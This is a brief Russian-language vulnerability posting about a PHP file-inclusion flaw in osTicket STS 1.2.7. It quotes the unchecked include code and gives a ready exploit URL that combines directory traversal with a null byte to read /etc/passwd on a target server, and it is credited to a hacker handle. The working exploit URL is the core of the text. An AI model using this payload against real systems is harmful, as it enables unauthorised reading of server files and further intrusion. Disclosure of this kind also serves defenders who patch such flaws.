Уязвимые продукты: osTicket STS 1.2.7 (возможно и старше)
Тип: PHP-Include
Результат: Чтение файлов на сервере
Код в скрипте:
if ($config[search_disp]) {
include("$include_dir/search.php");
}
По идее этот скрипт должен инклудится из другого места, но т.к. проверок никаких нету, мы просто обращаемся к нему.
Эксплойт:
http://target/include/mainphp?config[search_disp]= 1&include_dir=../../../../../../.././etc/passwd%00
Автор: DeCode(iNFERNo)
